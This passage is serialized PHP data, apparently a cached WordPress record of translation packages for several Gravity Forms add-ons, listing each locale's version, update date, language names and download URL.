(Sie)\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-de_DE_formal.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-04-29T16:41:43+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-01-27T16:56:20+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"hu\";a:7:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2023-03-02T20:50:29+00:00\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-hu_HU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hu\";i:1;s:3:\"hun\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:54:26+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2023-03-14T17:55:20+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2019-12-10T13:19:22+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2021-09-14T09:53:44+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:53:59+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:54:40+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:57:32+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-05-13T16:56:26+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2021-11-04T18:47:08+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.8.4\";s:7:\"updated\";s:25:\"2020-04-29T16:42:28+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformspaypalpro/gravityformspaypalpro-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:17:\"gravityformspolls\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T09:09:05+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-11-05T15:15:31+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T09:09:10+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T09:09:12+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T09:09:20+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:94:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2019-12-10T13:21:17+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-10-21T13:43:25+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-11-05T15:13:17+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:22:24+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-11-05T15:17:13+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:22:32+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-03-14T17:55:58+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:94:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2021-09-14T09:55:19+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-12-17T14:20:05+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-12-17T14:19:33+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-11-05T15:18:45+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:22:14+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2021-11-04T18:52:05+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-06-29T08:29:29+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformspolls/gravityformspolls-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:20:\"gravityformspostmark\";a:1:{s:12:\"translations\";a:15:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-24T11:44:53+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:11:37+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-25T21:03:26+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-31T19:40:40+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-03-29T18:54:45+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-22T09:30:48+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-26T12:48:57+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-06-04T08:26:03+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-09-14T09:55:49+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-31T04:01:04+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-04-11T21:20:33+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-20T16:53:54+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-06-01T17:59:01+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-06-05T06:35:48+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.3.1\";s:7:\"updated\";s:25:\"2021-05-26T23:45:38+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformspostmark/gravityformspostmark-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:16:\"gravityformsquiz\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:00+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:50+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:09+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:14+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:26+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:28+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:10:32+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:15+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:32+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:34+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:41+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-04-01T00:37:47+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:11:02+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-03-24T15:30:36+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do 